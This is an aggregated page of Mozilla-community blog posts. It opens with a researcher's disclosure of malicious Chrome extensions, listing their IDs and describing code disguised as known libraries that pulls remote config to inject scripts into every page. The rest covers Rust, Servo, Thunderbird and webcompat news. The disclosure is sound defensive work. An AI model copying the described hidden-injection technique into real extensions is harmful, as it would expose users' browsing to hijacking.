Maxi Refresher 3,483,639 lipmdblppejomolopniipdjlpfjcojob
Quick Translation 2,797,773 lmcboojgmmaafdmgacncdpjnpnnhpmei
Easyview Reader view 2,786,137 icnekagcncdgpdnpoecofjinkplbnocm
PDF toolbox 2,782,790 bahogceckgcanpcoabcdgmoidngedmfo
Epsilon Ad blocker 2,571,050 bkpdalonclochcahhipekbnedhklcdnp
Craft Cursors 2,437,224 magnkhldhhgdlhikeighmhlhonpmlolk
Alfablocker ad blocker 2,430,636 edadmcnnkkkgmofibeehgaffppadbnbi
Zoom Plus 2,370,645 ajneghihjbebmnljfhlpdmjjpifeaokc
Base Image Downloader 2,366,136 nadenkhojomjfdcppbhhncbfakfjiabp
Clickish fun cursors 2,353,436 pbdpfhmbdldfoioggnphkiocpidecmbp
Cursor-A custom cursor 2,237,147 hdgdghnfcappcodemanhafioghjhlbpb
Amazing Dark Mode 2,228,049 fbjfihoienmhbjflbobnmimfijpngkpa
Maximum Color Changer for Youtube 2,226,293 kjeffohcijbnlkgoaibmdcfconakaajm
Awesome Auto Refresh 2,222,284 djmpbcihmblfdlkcfncodakgopmpgpgh
Venus Adblock 1,973,783 obeokabcpoilgegepbhlcleanmpgkhcp
Adblock Dragon 1,967,202 mcmdolplhpeopapnlpbjceoofpgmkahc
Readl Reader mode 1,852,707 dppnhoaonckcimpejpjodcdoenfjleme
Volume Frenzy 1,626,760 idgncaddojiejegdmkofblgplkgmeipk
Image download center 1,493,741 deebfeldnfhemlnidojiiidadkgnglpi
Font Customizer 1,471,726 gfbgiekofllpkpaoadjhbbfnljbcimoh
Easy Undo Closed Tabs 1,460,691 pbebadpeajadcmaoofljnnfgofehnpeo
Screence screen recorder 1,459,488 flmihfcdcgigpfcfjpdcniidbfnffdcf
OneCleaner 1,457,548 pinnfpbpjancnbidnnhpemakncopaega
Repeat button 1,456,013 iicpikopjmmincpjkckdngpkmlcchold
Leap Video Downloader 1,454,917 bjlcpoknpgaoaollojjdnbdojdclidkh
Tap Image Downloader 1,451,822 okclicinnbnfkgchommiamjnkjcibfid
Qspeed Video Speed Controller 732,250 pcjmcnhpobkjnhajhhleejfmpeoahclc
HyperVolume 592,479 hinhmojdkodmficpockledafoeodokmc
Light picture-in-picture 172,931 gcnceeflimggoamelclcbhcdggcmnglm

Note that this list is unlikely to be complete. It’s based on a sample of roughly 1,600 extensions that I have locally, not all the Chrome Web Store contents.

The malicious code

There is a detailed discussion of the malicious code in my previous article. I couldn’t find any other extension using the same code as PDF Toolbox, but the two variants I discovered now are very similar. There are minor differences:

  • The first variant masquerades as Mozilla’s WebExtension browser API Polyfill. The “config” download address is https://serasearchtop.com/cfg/<Extension_ID>/polyfill.json, and the mangled timestamp preventing downloads within the first 24 hours is localStorage.polyfill.
  • The second variant masquerades as Day.js library. It downloads data from https://serasearchtop.com/cfg/<Extension_ID>/locale.json and stores the mangled timestamp in localStorage.locale.

Both variants keep the code of the original module; the malicious code has been added on top. The WebExtension Polyfill variant appears to be older: the extensions using it usually had their latest release at the end of 2021 or early in 2022. The extensions using the Day.js variant are newer, and their code has been obfuscated more thoroughly.

The extension logic remains exactly the same however. From the look of it, its purpose is making two very specific function calls: chrome.tabs.onUpdated.addListener and chrome.tabs.executeScript. So these extensions are meant to inject some arbitrary JavaScript code into every website you visit.

What does it actually do?

As with PDF Toolbox, I cannot observe the malicious code in action. The configuration data produced by serasearchtop[.]com is always empty for me. Maybe it’s not currently active, maybe it only activates some time after installation, or maybe I have to be in a specific geographic region. Impossible to tell.

So I went checking out what other people say. Many reviews for these extensions appear to be fake. There are also just as many reviews complaining about functional issues: people notice that these extensions aren’t really being developed. Finally, a bunch of Brisk VPN reviews mention the extension being malicious, sadly without explaining how they noticed.

But I found my answer in the reviews for the Image Download Center extension:

Review by Sastharam Ravendran in July 2021: SPAM. Please avoid. Few days after install, my search results in google were randomly being re-directed elsewhere. I was lost and clueless. I disabled all extensions and enabled them one by one to catch this culprit. Hate it when extension developers, use us as baits for such things. google should check and take action !

A reply by Mike Pemberton in January 2022: had the same happen to me with this extension from the Micrsoft edge store.

Another reply by Ande Walsh in September 2021: This guy is right. This is a dirty extension that installs malware. AVOID.

So it would seem that at least back in 2021 (yes, almost two years ago) the monetization approach of this extension was redirecting search pages. I’m pretty certain that these users reported the extension back then, yet here we still are. Yes, I’ve never heard about the “Report abuse” link in Chrome Web Store producing any result. Maybe it is a fake form only meant to increase customer satisfaction?

There is a similar two years old review on the OneCleaner extension:

Review by Vincent Descamps: Re-adding it to alert people: had to remove it, contains a malware redirecting to bing search engine when searching something on google using charmsearch.com bullcrap

Small correction: the website in question was actually called CharmSearching[.]com. If you search for it, you’ll find plenty of discussions on how to remove malware from your computer. The domain is no longer active, but this likely merely means that they switched to a less known name. Like… well, maybe serasearchtop[.]com. No proof, but serasearchtop[.]com/search/?q=test redirects to Google.

Mind you: just because these extensions monetized by redirecting search pages two years ago, it doesn’t mean that they still limit themselves to it now. There are way more dangerous things one can do with the power to inject arbitrary JavaScript code into each and every website.

This Week In RustThis Week in Rust 497

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on Twitter or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is progenitor, an OpenAPI client generator with support for strongly typed mock tests.

Thanks to John Vandenberg for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

325 pull requests were merged in the last week

Rust Compiler Performance Triage

A good week overall, with a broad set of improvements to many primary benchmarks. The main single source of primary regressions is from rollup PR #111869; we are in the process of narrowing that down to see if there is a root cause.

Triage done by @pnkfelix. Revision range: cda5becc..1221e43b

3 Regressions, 3 Improvements, 3 Mixed; 4 of them in rollups. 26 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New and Updated RFCs
Call for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Upcoming Events

Rusty Events between 2023-05-31 - 2023-06-28 🦀

Virtual
Asia
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Panics are overgrown ASSERTs, not an underbuilt exception system.

Stephan Sokolow on hacker news

Thanks to Stephan Sokolow for the self-suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Servo BlogAdding support for ‘outline’ properties

As mentioned in our last blog post, we’re currently working on selecting a layout engine for Servo between the original Layout 2013 and the newer Layout 2020.

Our plan has been to start by implementing some small features in Layout 2020, to help us decide whether to switch to the new layout engine, and in turn tackle more complex features like floats. One of these features was ‘outline’, which is now supported in the new engine.

A few days ago, we landed support for ‘outline’ and ‘outline-offset’. These properties are now fully supported in Servo, with two minor caveats:

  • Border and outline widths are not yet snapped at computed-value time — this is blocked on a Stylo upgrade to avoid diverging from Firefox
  • The ‘outline-style’ value ‘auto’ currently works like ‘solid’ — this is allowed by the spec, but we may be able to do something better here, like rounding the corners of the outline or matching the platform style

The impact of this feature is most noticeable in the focus styles for links and input fields. For example, the User Agent stylesheet already applies ‘outline: thin dotted’ to ‘a:focus’, so clicking the first link in

Lorem ipsum <a href="#">dolor sit amet</a>,
consectetur <a href="#">adipiscing elit</a>.

now yields

Text with two links where the first one is focused so it has a thin outline around it

Implementation

The bulk of the feature was implemented in #29695 (‘outline’) and #29702 (‘outline-offset’):

  1. In {longhands,shorthands}/outline.mako.rs, we enable ‘outline-offset’, ‘outline-color’, and ‘outline’ in Layout 2020, and remove the pref gates for ‘outline-style’ and ‘outline-width’, allowing those properties to be resolved and queried
  2. In BoxFragment::build_stacking_context_tree_for_children, we check ‘outline-width’ and (if non-zero) push a StackingContextFragment to remind ourselves to paint an outline for the box fragment when building its display list
  3. In StackingContext::build_display_list, we search for those reminders and paint the necessary outlines, but only after all other kinds of content in the stacking context (“out-of-band”)
  4. In BuilderForBoxFragment::build, we now need to handle requests to paint the Outline, not just the BlockBackgroundsAndBorders
  5. In BuilderForBoxFragment::build_outline, we paint the outline by creating a BorderDisplayItem in WebRender, while taking the ‘outline-offset’ into account

We also improved the shorthand serialisation in #29708, by replacing the #[derive(ToCss)] for ‘outline’ with a custom impl that returns ‘auto’ in the case where all of the longhands are set to initial values.

Tests and spec issues

The spec allows outlines to be painted either in-band, such that other elements can obscure them, or out-of-band, on top of all other content in the stacking context. We chose the latter, because it’s the recommended approach for accessibility and matches other browsers.

For example, the magenta element below overlaps the blue border of the previous element, but not the out-of-band cyan outline:

<div style="
    outline: 5px solid cyan;
    border: 5px solid blue;
">Lorem ipsum</div>
<div style="
    background: magenta;
    margin-top: -15px;
    width: 50px;
    height: 50px;
"></div>

Painting order is blue border, then magenta background, then “Lorem ipsum” and cyan outline

‘outline’ already has good test coverage, though during our implementation we added one new test to check that ‘background-clip’ works as expected with ‘border-radius’, which affects both borders and outlines in Servo.

We’ve also filed two spec issues:

As always, despite ‘outline’ being a well-known property that has long been implemented by all of the major engines, with every new implementation comes new opportunities to clarify specs and improve test coverage. Building features like ‘outline’ helps the web platform as much as it helps Servo.

The Rust Programming Language BlogOn the RustConf keynote

On May 26th 2023, JeanHeyd Meneide announced they would not speak at RustConf 2023 anymore. They were invited to give a keynote at the conference, only to be told two weeks later the keynote would be demoted to a normal talk, due to a decision made within the Rust project leadership.

That decision was not right, and first off we want to publicly apologize for the harm we caused. We failed you JeanHeyd. The idea of downgrading a talk after the invitation was insulting, and nobody in leadership should have been willing to entertain it.

Everyone in leadership chat is still working to fully figure out everything that went wrong and how we can prevent all of this from happening again. That work is not finished yet. Still, we want to share some steps we are taking to reduce the risk of something like this happening again.

The primary causes of the failure were the decision-making and communication processes of leadership chat. Leadership chat has been the top-level governance structure created after the previous Moderation Team resigned in late 2021. It’s made of all leads of top-level teams, all members of the Core Team, all project directors on the Rust Foundation board, and all current moderators. This leadership chat was meant as a short-term solution and lacked clear rules and processes for decision making and communication. This left a lot of room for misunderstandings about when a decision had actually been made and when individuals were speaking for the project versus themselves.

In this post we focus on the organizational and process failure, leaving room for individuals to publicly acknowledge their own role. Nonetheless, formal rules or governance processes should not be required to identify that demoting JeanHeyd’s keynote was the wrong thing to do. The fact is that several individuals exercised poor judgment and poor communication. Recognizing their outsized role in the situation, those individuals have opted to step back from top-level governance roles, including leadership chat and the upcoming leadership council.

Organizationally, within leadership chat we will enforce a strict consensus rule for all decision making, so that there is no longer ambiguity about whether something is an individual opinion or a group decision. We are going to launch the new governance council as soon as possible. We’ll assist the remaining teams to select their representatives in a timely manner, so that the new governance council can start and the current leadership chat can disband.

We wish to close the post by reiterating our apology to JeanHeyd, but also the wider Rust community. You deserved better than you got from us.

-- The members of leadership chat

Data@MozillaThis Week in Data: Reading “The Manager’s Path” by Camille Fournier

(“This Week in Glean Data” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)

Recently I’ve been granted the role of “tech-lead” of the Glean SDK, where I find myself responsible for more of the direction and communication regarding Glean. As part of my continuing professional development, I sat down to read “The Manager’s Path: A Guide for Tech Leaders Navigating Growth and Change” by Camille Fournier. The book focuses on several aspects of technical management up to and including managing several teams. In this blog I’d like to focus on the things that I took away from the book through the lens of my new role as tech-lead, most of which come from a couple of chapters in the book. Don’t take that to mean the rest of the content is anything less than really good; I’m simply choosing a narrow focus. I felt it was more appropriate and personal to share what I took away from it related to my new responsibilities. I highly recommend this book to any contributor, management or otherwise, as it can give you great insight into what good (and bad) management looks like, with some really good examples that delineate the idealistic views from the realistic views of different situations. So, without further ado, let’s get started with the things I gleaned from this book through the eyes of a new tech-lead.

The definition of “tech-lead” offered in the Tech-Lead chapter was one I both liked and agreed with. Basically, tech-leads aren’t necessarily the most senior person on the team, they are someone willing to take on the set of responsibilities of representing the team to management, vetting plans, and dealing with project management details. Tech-leads focus on these things so that the team as a whole can be more productive. Now that I find myself the tech-lead of Glean, my productivity comes second to the overall team’s effectiveness. The book suggests that the best trick a tech-lead can learn is the ability to step away from the code and balance their technical commitments with the needs of the team. This balancing act is something that I’m still working on, and has meant being more deliberate in managing my schedule and including focus times to get things done.

Another topic from the same chapter is the defining characteristics of the role. This, unsurprisingly, includes the importance of communication. This is something that I already knew from past experience, but the book reiterated to me that taking the time to explain things and listening can be extremely helpful, even in roles with newfound expectations of our expertise. It also includes having a thorough understanding of the architecture of the project so that you can make informed decisions that take the project as a whole into consideration and be able to offer more constructive feedback to changes. This allows the tech-lead to be able to “lead” the technical decisions rather than “make” all of them. Sometimes a tech-lead isn’t the expert in a particular aspect of the project. It falls on the tech-lead to understand who on the team has the context and knowledge to make the best decisions and empower them to do so. The final key characteristic of a tech-lead is that they are first and foremost a team player. They shouldn’t be doing all the interesting work themselves, they should instead be looking at the tricky and boring things and figuring out how to get them unstuck. But they also shouldn’t be doing only boring work, either. Being a tech-lead does mean less time to work on code some days, so knowing what you can (and can’t) commit to is also vital; being able to delegate effectively is critical.

The book points out that being a tech-lead is about managing projects as well as the team’s efforts towards them. The distinction the book makes between these is that managing projects tends to be more about managing time and complexity, while managing the team is more about trust and mentoring. Both have a strong overlap on communication being a key part of the formula for success. A tech-lead needs to be able to communicate about projects to different stakeholders, both in a way that management understands and in the more technical communications with the team. Being able to break down complex work into a series of deliverable tasks is only part of the picture. Knowing the level of detail that a particular project needs also plays into this because not every project needs the same level of project management. Ultimately, a tech-lead’s project management duties are about developing the discipline to think about something before diving into it and understanding how to structure the work so the team can better deliver on it.

Another chapter that I found tied in well with the tech-lead content that I’ve focused on so far is the chapter on “Mentoring”. Being a tech-lead is also about helping those around you reach their own goals, which means keeping up with regular one-on-one meetings with team members so that you can be aware of the challenges that they are facing and the successes they are having. This allows you to be able to provide guidance early and help unblock the team and to be able to call out these successes to management and peers. Being a tech-lead also means being open to the idea that you are now a source of feedback on career growth for your team. A willingness to share your insights into things that have helped you grow can help your teammates to identify areas they could potentially grow.

Finally, in the chapter on “Managing People” I found additional helpful information that tied in nicely with the other concepts that resonated with me in this book. This chapter mostly focuses on the importance of building relationships through trust and rapport, and how to clearly communicate your expectations. There’s also a ton of tips on how to improve these skills as well as how to structure and schedule your one-on-one meetings for success. I really appreciated the chapter mentioning how important it is to create a culture of continuous feedback. All of this points to the importance of communication and provides several useful examples of how to do it more effectively.

Like I mentioned before, the whole book is really well written with a great flow that builds upon each chapter. Each chapter is filled with great information for anyone in or considering a lead or management position. There’s a lot of very helpful communication and time management wisdom, even if you aren’t considering a leadership direction for your career. This blog post was purposefully scoped to my experiences, but I hope it was enough to encourage you to consider reading “The Manager’s Path: A Guide for Tech Leaders Navigating Growth and Change” by Camille Fournier, it’s definitely worth it!

The Mozilla BlogAdvancing the future of the internet with Adam Bouhenguel

A head shot of Adam Bouhenguel atop an illustration of cubes.<figcaption class="wp-element-caption">Adam Bouhenguel has partnered with Mozilla to look for new ways to build ecosystems that support builders working on the next generation of the web.</figcaption>

More than ever, we need a movement to ensure the internet remains a force for good. This post introduces the Mozilla Internet Ecosystem (MIECO) program, which fuels this movement by supporting people who are looking to advance a more human-centered internet. With MIECO, Mozilla is looking to foster a new era of internet innovation that moves away from “fast and breaking things” and into a more purposeful, collaborative effort that includes voices and perspectives from many different companies and organizations.

Today, we’re highlighting the work of Adam Bouhenguel, who has partnered with Mozilla to look for new ways to build ecosystems that support builders working on the next generation of the web.


Adam Bouhenguel has been building things for a long time. 

“As a kid, I would go to museums and fairs and see machines that people had built, or reproductions of famous machines throughout history, and then I would go home and build them out of Legos,” Adam said of his childhood in South Florida. 

Once, a friend told him that their cousin built games on calculators, so Adam carried around programming books until he learned how to program. “I spent a lot of time writing the things that I wanted to play,” Adam recalled. “So that was always a strong motivator for me.” 

Adam participated in programming and math competitions in high school. Before graduating, he interned at Motorola’s robotics group, where he developed software that ended up shipping with the company’s phones. Adam went on to attend MIT, during which he continued to work for Motorola.

“I realized how powerful tools can be,” Adam said. “If you have the right tools and the right ideas about what those tools should do, you can get much farther than you otherwise would.”

Adam’s love of technology and building found an early home at Y Combinator in 2007, where he launched his first company with a goal of simplifying the process of building software for mobile phones. At the time, the iPhone had yet to be announced, and Adam was already thinking about ways to make things easier for creators and developers — a mission that he’s continued working on over the past 15 years.

Today, Adam is using his experience as founder and community advocate to work with Mozilla on new ways to support builders, researchers, and individuals who are ready to be part of a larger movement for change in the way that we build the internet.

When Imo Udom joined Mozilla as the senior vice president of innovation towards the end of 2021, he knew that building a future home for innovation that could expand on the growth of Mozilla’s past 25 years would require new models for thinking about the ways that we work together. In late 2022, Mozilla launched the inaugural cohort of the Mozilla Internet Ecosystem (MIECO) program, where Imo worked closely with Adam to understand the landscape that researchers, computer scientists, and creators were facing and to identify ways to support the changing dynamics of building technology. MIECO is an opportunity to shift the way that we think about building software from a single corporate model to one that is grounded in community and open collaboration.

Exploring new ways of collaborating is a theme throughout Adam’s work. His current MIECO projects, which include the Open Retrospective Contributor Agreement (ORCA), Metered.dev, and Research Portfolio, all seek to give developers and researchers new tools to share and iterate on their work. As more of the world gains access to the internet, Adam sees a need for different models for attribution and sharing in the value generated by different projects and ideas.

ORCA, which allows open source project maintainers to fund contributors, is just one example of an experimental new approach that may encourage more organizations and individuals to work in the open. Making sure that people’s respective work is acknowledged and valued, Adam says, will encourage innovation and translate to better products in the market. While ORCA is in its infancy, it shows promise in helping people shift their thinking about what the future of compensation might look like within technological ecosystems.

Adam believes that making it easier for developers to monetize their work will lead to more sharing of ideas, with the ultimate goal of creating better solutions for some of the most challenging problems that we’re facing as a society today. With that goal in mind, he created Metered.dev, a platform for developers to easily publish and charge for the software that they’re creating, and Research Portfolio, a way for researchers to record and reward the influential work that has shaped their own thinking. 


Adam hopes that ultimately, people are inspired to think deeper about the software they choose to use.

“We’ll get to see what things are based on, what they’re inspired by,” Adam said. “We can give credit to these ideas that become software that we depend on and benefit from.”

The post Advancing the future of the internet with Adam Bouhenguel appeared first on The Mozilla Blog.

Karl DubostWebcompat Outreach, Mon Amour…

I was listening to a podcast by Brian Kardell and Eric Meyer. Toward the end, they mention the challenges of outreach in the context of broken Web sites.

Brian says:

It would have to be, enough people would have to complain. A browser wouldn't tell a lie if they could reach out and get you to update it.

I wrote in the past about the need for browsers to lie to websites and the consequences for both websites and browsers.

  1. Websites fail to support a browser A for a reason X. Sometimes there is not enough market share for them to care.
  2. Browser A lies to be able to get the right code path.
  3. The websites' analytics show that browser A is not accessing them.
  4. Goto 1.

And if you wanted to update my website or your website, that would be relatively easy. They would just send us an email and we'd be like, 'Oh, crap, let me fix that right away.'

It's not that easy. It is still hard to contact individuals. It takes time. The person sometimes has no real control over their "personal website". And the benefits/cost ratio is very low. (Note that Brian and Eric were talking about their actual personal websites, and it is indeed easier to contact public, tech-savvy people.)

But when it comes to Wells Fargo, or Yahoo, or some big site with lots and lots and lots of people who go there…

Here it depends on the category of website. Yahoo! is a lot easier to contact than certain types of websites:

  • Bank
  • Casino
  • Illegal streaming
  • certain Adult content
  • Governments
  • All sites which are flyers or one-off marketing stunts

Another parameter: culture!

The structure of the business of creating websites, and the relationship of Web developers with their direct and indirect hierarchy, is not the same across regions of the world. For some Web developers it will be very hard to challenge the decision-making process with regards to a website. In some circumstances, the bottom-up approach of contacting someone will not work, and you would need to take a top-down approach.

Brian continues:

CNN.com, right. And can we actually reach them? Can we get them to change it? Even worse, for ones that are under the covers, they're the same, but you don't know. They resell, effectively. It's a website's package and it gets very, very hard to know who to reach. They're unresponsive, because they've sort of outsourced their website, really. So there's not always a person you can reach out to. But in the meantime, everybody's going to complain, so they'll lie. And those are the sites really. Those sites are going to be included every time. You know what I mean? The things that we estimate usage on are estimated from looking at the HTTP requests to lots and lots and lots of websites. And then it's extrapolated from there. But the set of websites is which ones are popularly loaded. And in the grand scheme of things, our websites are not destinations.

This is when I thought about the title of this post: Webcompat Outreach, Mon Amour. The last time I used that reference, it put me in hot water, because a person reading it in a comment thought I was being literal and actually calling her "Mon Amour", while I was making a reference to Hiroshima Mon Amour, a movie by Alain Resnais, written by Marguerite Duras. Culture differences, as mentioned earlier. This poetic movie subtly reveals our tensions at a global and personal level.

Still from the movie where the main actress says: Sometimes we have to avoid thinking about the problems life presents. Otherwise we'd suffocate.

Hence webcompat outreach, where simple, minimal code mistakes or choices affect a large number of people. Each decision we make has consequences for the balance of the ecosystem. We pour love into our craft and are still constrained by the machinery of administration.

I have written about outreach multiple times. You do not need to work for a big company to be able to contact a website, and every individual can help by communicating clearly with the people handling a website that presents issues. This is not an impossible task. It just takes patience, courage and resilience.

In What do you need to do before doing outreach, my last section mentioned all the reasons why outreach might fail. There are techniques to find people online and to track down who to contact. On the webcompat.com website, I had written about different techniques to find a way to reach the right person and the attitudes you need to have:

  • Be tactful: People we are trying to reach have their own set of constraints, bosses, economic choices etc. "Your web site is bad" will not lead anywhere, except NOT getting the site fixed.
  • Be humble: We are no better, we also make mistakes in practice. Our own recommendations can become outdated as technical or economic circumstances change.
  • Let it go: Sometimes outreach just doesn't work. The person at the end of the other line may say "no" or worse, may not answer. It can be very frustrating. It's okay. Accept it and move on.
  • Be passionate: The passion is in being able to find the right contact in a company without harassing them. Every effort helps.
  • Share with consideration: Share any contact you attempted or made in the issue comments section. It helps everyone to know the status so they can pitch in or not repeat work. That said - be careful to not disclose private information such as names and emails. You may simply say: "I contacted someone at $COMPANY", "Someone from $COMPANY said this…"

Otsukare!

Mozilla ThunderbirdIntroducing The Brand New Thunderbird Logo!

A circular app icon resembling a blue elemental bird, wrapped around and protecting a white envelope.

Hello Thunderbird Family! After nearly 20 years, we are thrilled to share a completely redesigned Thunderbird logo that honors our history and vital connection to Mozilla, while carrying us forward into the next 20 years.

It’s no secret that after many years of being viewed as stagnant, Thunderbird is enjoying a resurgence. Our project is thriving with a renewed sense of purpose, and we see an invigorating energy bubbling up from our users, our community of contributors, and our core team. 

Just like the software, the current Thunderbird logo has seen small, iterative improvements throughout the last 20 years. But now the software is evolving into something more modern (while retaining its powerful customization) and we believe it deserves a fresh logo that properly represents this revitalization. 

But you should never forget your roots, which is why we asked Jon Hicks, the creator of the original Firefox and Thunderbird logos, to re-imagine his iconic design in light of Thunderbird’s exciting future. 

Here’s a look at our new logo across Linux, Windows, macOS, Android, and iOS.

The new logo for Thunderbird, with slight variations for different operating systems. It's a circular app icon resembling a blue elemental bird, wrapped around and protecting a white envelope. <figcaption class="wp-element-caption">Yes, we have officially added an iOS version of Thunderbird to our future development roadmap. Expect more concrete news about this toward the end of 2023.</figcaption>
The new logo for Thunderbird, with slight variations for different operating systems, pictured here for Android. It's a circular app icon resembling a blue elemental bird, wrapped around and protecting a white envelope.

And here’s a glimpse of what Thunderbird for Android will look like on an Android device, sitting next to our best friend Firefox:

side-by-side screenshots of an Android device, highlighted by Thunderbird and Firefox logos.

When can you see it integrated with Thunderbird itself? Our plan is to incorporate it into Thunderbird 115 (code-named “Supernova“) this summer. During the next few months, we’ll also gradually redesign our website and update the branding on various social channels and communication platforms.

We understand that change can be uncomfortable, but we hope you agree this is a positive new look for the project. I encourage everyone to do what we did throughout this process: to live with the new design for a while. Let it breathe, let it sink in, and let us know what you think after a few days.

We all have a soft spot for the old Thunderbird logo (which I affectionately call the “wig on an envelope”), but our project is changing in big, positive ways, and we want to clearly show that to the world with a beautiful, revitalized logo and icon.

So here’s to a bright future! On behalf of the entire team: thank you for taking this journey with us. We wouldn’t be here without you.

Ryan Sipes
Thunderbird Product Manager

 

The post Introducing The Brand New Thunderbird Logo! appeared first on The Thunderbird Blog.

Anne van KesterenWebKit and web-platform-tests

Let me state upfront that this strategy of keeping WebKit synchronized with parts of web-platform-tests has worked quite well for me, but I’m not at all an expert in this area so you might want to take advice from someone else.

Once I've identified what tests will be impacted by my changes to WebKit, including what additional coverage might be needed, I create a branch in my local web-platform-tests checkout to make the necessary changes to increase coverage. I try to be a little careful here so it'll result in a nice pull request against web-platform-tests later. I’ve been a web-platform-tests contributor quite a while longer than I’ve been a WebKit contributor so perhaps it’s not surprising that my approach to test development starts with web-platform-tests.

I then run import-w3c-tests web-platform-tests/[testsDir] -l -s [wptParentDir] --clean-dest-dir on the WebKit side to ensure it has the latest tests, including any changes I made. And then I usually run them and revise, as needed.

This has worked surprisingly well for a number of changes I made to date and hasn’t let me down. Two things to be mindful of:

  • On macOS, don’t put development work, especially WebKit, inside ~/Documents. You might not have a good time.
  • [wptParentDir] above needs to contain a directory named web-platform-tests, not wpt. This is annoyingly different from the default you get when cloning web-platform-tests (the repository was renamed to wpt at some point). Perhaps something to address in import-w3c-tests.
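Putting the pieces together, here is a minimal sketch of the sync step. The directory layout and test subdirectory below are hypothetical, and running import-w3c-tests from Tools/Scripts inside the WebKit checkout is my assumption; adjust to your own setup:

```shell
# Hypothetical layout (illustrative, not taken from this post):
#   ~/dev/web-platform-tests  - local checkout; note the directory must be
#                               named "web-platform-tests", not "wpt"
#   ~/dev/WebKit              - WebKit checkout
wptParentDir=~/dev       # [wptParentDir]: contains web-platform-tests/
testsDir=dom/events      # [testsDir]: hypothetical wpt subdirectory being synced

# The import command, as run from the root of the WebKit checkout
# (import-w3c-tests is assumed to live in Tools/Scripts):
cmd="Tools/Scripts/import-w3c-tests web-platform-tests/$testsDir -l -s $wptParentDir --clean-dest-dir"
echo "$cmd"
```

The `-s` flag points at the parent of the web-platform-tests directory, so local, not-yet-upstreamed changes in that checkout are picked up by the import.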

This Week In RustThis Week in Rust 496

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on Twitter or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Research
Miscellaneous

Crate of the Week

This week's crate is whichlang, a fast no-dependencies OSS natural language detector.

Thanks to Brian Kung for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

314 pull requests were merged in the last week

Rust Compiler Performance Triage

There were a few regressions, but most were expected, and one in particular (PR #111807) is expected to yield gains in object code performance at the expense of a slight compile-time hit. There are a couple of PRs that need future follow-up, namely PRs #111364 and #111524.

Triage done by @pnkfelix. Revision range: 3ea9ad53..cda5becc

3 Regressions, 2 Improvements, 5 Mixed; 2 of them in rollups. 51 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New and Updated RFCs
Call for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

  • No RFCs issued a call for testing this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Upcoming Events

Rusty Events between 2023-05-24 - 2023-06-21 🦀

Virtual
Asia
Europe
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I guess the nicest example of this phenomenon is shared mutability. Programmers have been arguing for decades whether it is sharing xor mutability that causes memory safety bugs:

  • "It's threads!" – shouted JavaScript and Python, and JS remained single-threaded, and Python introduced the GIL.
  • "It's mutability!" – screamed Haskell and Erlang, and they made (almost) everything immutable.

And then along came Rust, and said: "you are fools! You can have both sharing and mutability in the same language, as long as you isolate them from each other."

H2CO3 on rust-users

Thanks to Jacob Pratt for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Firefox NightlyA Bountiful Blend of Browser Betterments – These Weeks in Firefox: Issue 138

Highlights

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug
  • Gregory Pappas [:gregp]
  • Itiel
  • Mathew Hodson
  • Pier Angelo Vendrame
New contributors (🌟 = first patch)

 

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
